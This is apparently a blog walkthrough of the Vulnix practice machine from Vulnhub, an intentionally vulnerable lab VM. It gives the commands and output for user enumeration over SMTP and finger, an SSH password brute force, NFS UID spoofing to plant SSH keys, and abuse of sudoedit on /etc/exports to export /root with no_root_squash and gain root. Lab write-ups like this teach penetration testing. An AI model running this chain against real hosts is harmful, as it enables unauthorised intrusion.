Today we will be doing the walkthrough for machine called Vulnix from Vulnhub
Link for the VM: https://www.vulnhub.com/entry/hacklab-vulnix,48/
Lets start:
Machine ip address: 192.168.56.16
root@kali:~/vulnix# netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
IP At MAC Address Count Len MAC Vendor / Hostname
192.168.56.1 0a:00:27:00:00:00 1 60 Unknown vendor
192.168.56.2 08:00:27:2e:85:97 1 60 PCS Systemtechnik GmbH
192.168.56.16 08:00:27:fa:b2:da 1 60 PCS Systemtechnik GmbH
Service Enumeration:
root@kali:~/vulnix# nmap -A -Pn -p- -oA vul -T4 192.168.56.16
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-10 16:55 EDT
Nmap scan report for 192.168.56.16
Host is up (0.0097s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, |_ssl-date: 2019-08-10T20:56:29+00:00; +26s from scanner time.
79/tcp open finger Linux fingerd |_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: CAPA UIDL SASL RESP-CODES STLS PIPELINING TOP |_ssl-date: 2019-08-10T20:56:29+00:00; +27s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000) |
rpcinfo: |
program version port/proto service |
100000 2,3,4 111/tcp rpcbind |
100000 2,3,4 111/udp rpcbind |
100003 2,3,4 2049/tcp nfs |
100003 2,3,4 2049/udp nfs |
100005 1,2,3 36521/udp mountd |
100005 1,2,3 51820/tcp mountd |
100021 1,3,4 41797/udp nlockmgr |
100021 1,3,4 42073/tcp nlockmgr |
100024 1 43593/udp status |
100024 1 60558/tcp status |
100227 2,3 2049/tcp nfs_acl |
100227 2,3 2049/udp nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 SASL-IR LOGIN-REFERRALS LITERAL+ STARTTLS more listed ENABLE LOGINDISABLEDA0001 have capabilities Pre-login OK post-login ID IDLE
|_ssl-date: 2019-08-10T20:56:30+00:00; +27s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
|_ssl-date: 2019-08-10T20:56:29+00:00; +27s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019-08-10T20:56:28+00:00; +26s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
35893/tcp open mountd 1-3 (RPC #100005)
42073/tcp open nlockmgr 1-4 (RPC #100021)
51820/tcp open mountd 1-3 (RPC #100005)
58619/tcp open mountd 1-3 (RPC #100005)
60558/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:FA:B2:DA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 – 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 26s, deviation: 0s, median: 26s
TRACEROUTE
HOP RTT ADDRESS
1 9.66 ms 192.168.56.16
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.17 seconds
root@kali:~/vulnix#
As per above output, we can multiple service running on the machine.
With SMTP service ,we can enumerate the users on the machine.
With Finger service, we can enumerate the users logged on the machine.
With NFS, we can find if we have access to files/directory on the machine.
Let see what we can find .
SMTP enumeration
From SMTP enumeration, we found below users exits on the machine.
root@kali:~/vulnix# smtp-user-enum -M VRFY -U common.txt -t 192.168.56.16
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
| Scan Information |
root@kali:~/vulnix# smtp-user-enum -M VRFY -U unix_users.txt -t 192.168.56.16
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
| Scan Information |
Mode ………………… VRFY
Worker Processes ……… 5
Usernames file ……….. unix_users.txt
Target count …………. 1
Username count ……….. 113
Target TCP port ………. 25
Query timeout ………… 5 secs
Target domain …………
## Scan started at Sat Aug 10 17:09:42 2019
192.168.56.16: ROOT exists
192.168.56.16: backup exists
192.168.56.16: bin exists
192.168.56.16: daemon exists
192.168.56.16: gnats exists
192.168.56.16: games exists
192.168.56.16: irc exists
192.168.56.16: list exists
192.168.56.16: libuuid exists
192.168.56.16: lp exists
192.168.56.16: mail exists
192.168.56.16: man exists
192.168.56.16: messagebus exists
192.168.56.16: news exists
192.168.56.16: nobody exists
192.168.56.16: postmaster exists
192.168.56.16: proxy exists
192.168.56.16: root exists
192.168.56.16: sshd exists
192.168.56.16: sync exists
192.168.56.16: sys exists
192.168.56.16: syslog exists
192.168.56.16: user exists
192.168.56.16: uucp exists
192.168.56.16: www-data exists
## Scan completed at Sat Aug 10 17:09:43 2019
25 results.
113 queries in 1 seconds (113.0 queries / sec)
root@kali:~/vulnix#
root@kali:~/vulnix#
Finger Enumeration
user.txt contains all the users from SMTP enumeration.
root@kali:~/vulnix# ./finger_enum_user.sh user.txt
User : ROOT
finger: ROOT: no such user.
User : backup
Login: backup Name: backup
Directory: /var/backups Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : bin
Login: bin Name: bin
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : daemon
Login: daemon Name: daemon
Directory: /usr/sbin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : gnats
Login: gnats Name: Gnats Bug-Reporting System (admin)
Directory: /var/lib/gnats Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : games
Login: games Name: games
Directory: /usr/games Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : irc
Login: irc Name: ircd
Directory: /var/run/ircd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : list
Login: list Name: Mailing List Manager
Directory: /var/list Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : libuuid
Login: libuuid Name:
Directory: /var/lib/libuuid Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : lp
Login: lp Name: lp
Directory: /var/spool/lpd Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : mail
Login: mail Name: mail
Directory: /var/mail Shell: /bin/sh
Never logged in.
No mail.
No Plan.
Login: dovecot Name: Dovecot mail server
Directory: /usr/lib/dovecot Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : man
Login: man Name: man
Directory: /var/cache/man Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : messagebus
Login: messagebus Name:
Directory: /var/run/dbus Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : news
Login: news Name: news
Directory: /var/spool/news Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : nobody
Login: nobody Name: nobody
Directory: /nonexistent Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : postmaster
finger: postmaster: no such user.
User : proxy
Login: proxy Name: proxy
Directory: /bin Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : root
Login: root Name: root
Directory: /root Shell: /bin/bash
Last login Fri Aug 2 23:46 (BST) on pts/0 from 192.168.56.4
No mail.
No Plan.
User : sshd
Login: sshd Name:
Directory: /var/run/sshd Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
User : sync
Login: sync Name: sync
Directory: /bin Shell: /bin/sync
Never logged in.
No mail.
No Plan.
User : sys
Login: sys Name: sys
Directory: /dev Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : syslog
Login: syslog Name:
Directory: /home/syslog Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : user
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
User : uucp
Login: uucp Name: uucp
Directory: /var/spool/uucp Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User : www-data
Login: www-data Name: www-data
Directory: /var/www Shell: /bin/sh
Never logged in.
No mail.
No Plan.
User :
No one logged on.
From above, we are interested in 2 users, root and user.
Let proceed further.
Using Hydra brute force for user for shh, found the password as letmein. For root, didnt find anything.
root@kali:~/vulnix# hydra -l user -P rockyou.txt ssh://192.168.56.16
Hydra v8.8 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-10 17:13:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
NFS enumeration
root@kali:~/vulnix# showmount -e 192.168.56.16
Export list for 192.168.56.16:
/home/vulnix *
root@kali:~/vulnix#
We can access /home/vulnix .Let see what we can find there.
root@kali:~/vulnix# mkdir mnt
root@kali:~/vulnix#
root@kali:~/vulnix# mount 192.168.56.16:/home/vulnix mnt
root@kali:~/vulnix# ls -alrth
total 286M
drwxr-x— 2 nobody 4294967294 4.0K Sep 2 2012 mnt
We have nobody as the user.
root@kali:~/vulnix# cd mnt/
bash: cd: mnt/: Permission denied
root@kali:~/vulnix#
and we got permission denied.
After doing google for some time, found this about root_squash which can be causing this.
https://en.wikipedia.org/wiki/Unix_security#Root_squash
http://fullyautolinux.blogspot.com/2015/11/nfs-norootsquash-and-suid-basic-nfs.html
By default, mount will use version NFS v4 to mount the directories.Google research told to use version 3. Lets try that.
root@kali:~/vulnix# mount -o vers=3 192.168.56.16:/home/vulnix mnt
root@kali:~/vulnix# ls -alrth
total 286M
drwxr-x— 2 2008 2008 4.0K Sep 2 2012 mnt
If you look closley, mnt directoty has mounted with user and group is as 2008. Now you have never seen user and group id like this. You have always seen username and groupname in ls command output. So why we are seeing user ID and group ID here.
Reason is : This userid and group id is not assigned to any user on this machine ( kali machine). Therefore, on mounting this share on kali machine, it is showing user id and group id.
If we try to cd into mnt, we are getting, Permission denied
root@kali:~/vulnix# cd mnt/
bash: cd: mnt/: Permission denied
root@kali:~/vulnix#
Now we need to know id 2008 belongs to which user or group . If we can find that , then we will assign user id/group id to that user on Kali machine and then we maybe access the mnt share directory.
Now, how to find that user. Remmeber, we are mounting /home/vulnix from target machine (192.168.56.16) in mnt directory on kali machine.
If we login into target machine and check for /etc/password file ( if we have access), then we can see that which user has ID 2008. So lets try that.
Remember, we have ssh access for user “user” with password “letmein” , we got from hydra brute force.
root@kali:~/vulnix# ssh user@192.168.56.16
The authenticity of host ‘192.168.56.16 (192.168.56.16)’ can’t be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.56.16’ (ECDSA) to the list of known hosts.
user@192.168.56.16’s password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
- Documentation: https://help.ubuntu.com/
System information as of Sat Aug 10 22:58:20 BST 2019
System load: 0.0 Processes: 88
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 3% IP address for eth0: 192.168.56.16
Swap usage: 0% => / is using 90.2% of 773MB Graph this data and manage this system at https://landscape.canonical.com/
user@vulnix:~$
There are 2 users in home directory.
user@vulnix:/home$ ls -alrth
total 16K
drwxr-xr-x 22 root root 4.0K Sep 2 2012 ..
drwxr-xr-x 4 root root 4.0K Sep 2 2012 .
drwxr-x— 2 vulnix vulnix 4.0K Sep 2 2012 vulnix
drwxr-x— 3 user user 4.0K Sep 2 2012 user
user@vulnix:/home$
user@vulnix:~$
user@vulnix:~$ cat /etc/passwd
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$
user@vulnix:/etc$ cat group
sambashare:x:116:
vulnix:x:2008:
user@vulnix:/etc$
As per /etc/passwd, 2008 belongs to user vulnix. Also group id 2008 belongs to vulnix group
So this means, we need to create the user vulnix with userid as 2008( on Kali machine) to access the share /home/vulnix on kali machine. Similarly, we need to create the group id 2008 with group name as vulnix on kali machine .
So lets do that.
Creating group vulnix with id as 2008 on kali machine.
root@kali:~/vulnix# groupadd -g 2008 vulnix
root@kali:~/vulnix#
Creating user vulnix with id as 2008 on kali machine and assigning it to group id 2008.
root@kali:~/vulnix# useradd -u 2008 vulnix -g 2008
root@kali:~/vulnix#
Now lets mount again.
root@kali:~/vulnix# mount -o vers=3 192.168.56.16:/home/vulnix mnt
root@kali:~/vulnix#
root@kali:~/vulnix# ls -alrth
total 286M
drwxr-x— 2 vulnix vulnix 4.0K Sep 2 2012 mnt
So mnt share on Kali machine has same user and group as /home/vulnix on target machine. ( Remember, we are mounting /home/vulnix from target machine into mnt on kali machine)
Exploitation:
Lets dive in.
root@kali:~/vulnix# cd mnt/
bash: cd: mnt/: Permission denied
root@kali:~/vulnix#
Aha. What happened. We have covered all the points.
Till now ,we are root user. But mnt is accessible by vulnix user ( which we created on Kali machine). So we need to change the user to vulnix and then we can access the mnt folder.
root@kali:~/vulnix# su vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ /bin/bash -i
vulnix@kali:/root/vulnix$
vulnix@kali:/root/vulnix$ cd mnt/
vulnix@kali:/root/vulnix/mnt$ ls -alrth
total 20K
-rw-r–r– 1 vulnix vulnix 675 Apr 3 2012 .profile
-rw-r–r– 1 vulnix vulnix 3.5K Apr 3 2012 .bashrc
-rw-r–r– 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
drwxr-x— 2 vulnix vulnix 4.0K Sep 2 2012 .
drwxr-xr-x 3 root root 4.0K Aug 10 17:24 ..
vulnix@kali:/root/vulnix/mnt$
So we can access the share mnt or /home/vulnix . Congrats for reaching till here 🙂
Read carefully from here, things can go here and there.
As per above output, user vulnix(on kali machine) has read write access. So this means, vulnix user can read/write or create any file or directoy, right .
Now as you know, we are mounting NFS share, any changes we are going to do on this dir ( mnt) on kali machine will be reflected on /home/vulnix directory on target machine. ( If you are confused about this or it is not clear, Kindly read on NFS share and it will clear things 🙂
Now we need root shell on the target machine and we have 2 options for now.
- We can login as user “user” with password as letmein and try to esaclate to root OR
- If possible somehow, login as vulnix user and then try to escalate to root.
Also we have seen earlier in /etc/paaswd file that we have vulnix user. We dont know the password yet for vulnix user.
Since we only has ssh service running, we can safely assume that we can login via ssh into the target machine.
There are 2 methods to login in via ssh.
- Password
- ssh keys
For vulnix user, we dont have password, we can try to login via key.
To login via ssh key. public key should be available in .ssh/authorized_keys in user home directoy. More on this “https://www.ssh.com/ssh/authorized_keys/”
We have r/w access to /home/vulnix folder via mnt (on Kali machine), so we can generate a private/public key pair and put the public key in .ssh/authorized_keys file.
Lets do this.
Creating private/public keys
root@kali:~/vulnix# ssh-keygen -h
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/vulnix/keys
/root/vulnix/keys already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/vulnix/keys.
Your public key has been saved in /root/vulnix/keys.pub.
The key fingerprint is:
SHA256:T/FrRYF/3JAd+ttBbHi9u+/Y6L8o690MGnOzY95d/i4 root@kali
The key’s randomart image is:
+—[RSA 2048]—-+
| ..+.|
| . .o|
| . +.Bo|
| o . =|
| S . . .= |
| o o =|
| .oo+ oo|
| ooE=+|
| .+==@&|
+—-[SHA256]—–+
root@kali:~/vulnix#
I have my public and private key.
root@kali:~/vulnix# ls -alrt | grep key
-rw-r–r– 1 root root 391 Aug 10 18:37 keys.pub
-rw——- 1 root root 1811 Aug 10 18:37 keys
root@kali:~/vulnix#
Copying publc key into .ssh/authorized_keys into /home/vulnix ( on target machine) via mnt folder on kali machine.
Creating .ssh folder
vulnix@kali:/root/vulnix/mnt$ mkdir .ssh
vulnix@kali:/root/vulnix/mnt$ cd .ssh
Copying public key in authorized_keys file
vulnix@kali:/root/vulnix/mnt/.ssh$ echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrgyNNgtxvnMs6qF7IR2X9eAwb6U5KRlmjnICvDE1m9+wE4D34NdTPuEtY024kEr4yV++9SY9srM/t+cBi1Z6fXgAp8QSAZTltM7SlGzHFZA01WfsK+AWrWSMHlNta8UdSNOdlMD7hdwJHQU5tEvPdSSLjJaOHHxFG3OAaXnEXNlS08Z1qt/2i7Z4ZXwRx2lyWfw3IURlytJLv7P57wb4aaIk0aKsxFRW4DccdlYSNna2TjEvWOtse7+fdoYCyNzHYoseUqgi09Wx4oEep543BlJ6h4dt7E3oep95kP9REIvoU8qvUS2wk+GJF6670X8jCafJSoQRy7C3sXyWiWtXz root@kali” >authorized_keys
vulnix@kali:/root/vulnix/mnt/.ssh$
vulnix@kali:/root/vulnix/mnt/.ssh$
vulnix@kali:/root/vulnix/mnt/.ssh$ ls -alrth
total 12K
drwxr-x— 3 vulnix vulnix 4.0K Aug 10 18:39 ..
-rw-r–r– 1 vulnix vulnix 391 Aug 10 2019 authorized_keys
drwxr-xr-x 2 vulnix vulnix 4.0K Aug 10 2019 .
vulnix@kali:/root/vulnix/mnt/.ssh$
Now as I have mentioned earlier, target machine ( 192.168.56.16) has same file under /home/vulnix home directory.
We are all set to login into target machine as vulnux user with ssh keys.
Lets do it
root@kali:~/vulnix# ssh -i keys vulnix@192.168.56.16
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
- Documentation: https://help.ubuntu.com/
System information as of Sat Aug 10 23:44:35 BST 2019
System load: 0.0 Processes: 88
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 3% IP address for eth0: 192.168.56.16
Swap usage: 0% => / is using 90.2% of 773MB Graph this data and manage this system at https://landscape.canonical.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
vulnix@vulnix:~$
and we are in as vulnix user
Now we will enumerate more for this user as how we can escalate to root.
vulnix@vulnix:~$
vulnix@vulnix:~$ sudo -l
Matching ‘Defaults’ entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$
so we have access to sudoedit /etc/exports with root priv without any password, let try that .
/etc/exports: the access control list for filesystems which may be exported
to NFS clients. See exports(5).
#
Example for NFSv2 and NFSv3:
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
Example for NFSv4:
/srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
/srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
and we have root_squash enabled which we talked about earlier.
Here we can add root home directoy with no_root_squash option to share the root directory via nfs ( Found after google search)
So our file wil look like this.
/etc/exports: the access control list for filesystems which may be exported
to NFS clients. See exports(5).
#
Example for NFSv2 and NFSv3:
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
Example for NFSv4:
/srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
/srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
After this we need to restart the target machine so that changes will take affect ( Found after google search)
root@kali:~/vulnix# showmount -e 192.168.56.16
Export list for 192.168.56.16:
/root * >>>>>>>>
/home/vulnix *
root@kali:~/vulnix#
and we can see our root share.
Let access root share using same mount command used earlier.
un mount the exising share.
root@kali:~/vulnix# umount -f /root/vulnix/mnt
root@kali:~/vulnix#
mount it again
root@kali:~/vulnix# mount -o vers=3 192.168.56.16:/root mnt
root@kali:~/vulnix# cd mnt/
root@kali:~/vulnix/mnt# ls -alrth
total 28K
-rw-r–r– 1 root root 140 Apr 19 2012 .profile
-rw-r–r– 1 root root 3.1K Apr 19 2012 .bashrc
-rw——- 1 root root 710 Sep 2 2012 .viminfo
-r——– 1 root root 33 Sep 2 2012 trophy.txt >>>>>>>>
drwx—— 2 root root 4.0K Sep 2 2012 .cache
-rw——- 1 root root 0 Sep 2 2012 .bash_history
drwx—— 3 root root 4.0K Sep 2 2012 .
drwxr-xr-x 3 root root 4.0K Aug 10 17:24 ..
root@kali:~/vulnix/mnt# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
root@kali:~/vulnix/mnt#
and we have trophy.txt and our job is done.
We found the final flag on the machine. But do you noticed that we still didt have root acess on target machine.
Earlier we have vulnix@vulnix ( when we logged in as vulnix users into target machine) , but we dont have root@vulnix access.
Can we somehow have that access?
Can you use the same publc private key techniqu to ssh into machine with root user.
Let try that .
Same as before. we need to copy the publc key into .ssh/authorized_keys file . We can use the existing public key. No need to genrate new kys.
root@kali:~/vulnix/mnt# mkdir .ssh
root@kali:~/vulnix/mnt# cd .ssh
root@kali:~/vulnix/mnt/.ssh# echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrgyNNgtxvnMs6qF7IR2X9eAwb6U5KRlmjnICvDE1m9+wE4D34NdTPuEtY024kEr4yV++9SY9srM/t+cBi1Z6fXgAp8QSAZTltM7SlGzHFZA01WfsK+AWrWSMHlNta8UdSNOdlMD7hdwJHQU5tEvPdSSLjJaOHHxFG3OAaXnEXNlS08Z1qt/2i7Z4ZXwRx2lyWfw3IURlytJLv7P57wb4aaIk0aKsxFRW4DccdlYSNna2TjEvWOtse7+fdoYCyNzHYoseUqgi09Wx4oEep543BlJ6h4dt7E3oep95kP9REIvoU8qvUS2wk+GJF6670X8jCafJSoQRy7C3sXyWiWtXz root@kali” >authorized_keys
root@kali:~/vulnix/mnt/.ssh#
root@kali:~/vulnix/mnt/.ssh#
root@kali:~/vulnix/mnt/.ssh#
root@kali:~/vulnix/mnt/.ssh# ls -alrth
total 12K
drwx—— 4 root root 4.0K Aug 10 2019 ..
drwxr-xr-x 2 root root 4.0K Aug 10 2019 .
-rw-r–r– 1 root root 391 Aug 10 2019 authorized_keys
Now let us the privte key to login as root via ssh.
root@kali:~/vulnix# ssh -i keys root@192.168.56.16
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
- Documentation: https://help.ubuntu.com/
System information as of Sat Aug 10 23:59:15 BST 2019
System load: 0.0 Processes: 89
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 3% IP address for eth0: 192.168.56.16
Swap usage: 0% => / is using 90.2% of 773MB Graph this data and manage this system at https://landscape.canonical.com/
root@vulnix:~#
and we have logged in as root on target machine.
Thanks for staying til the end 🙂
Learnt a lot.
Learning and Sharing 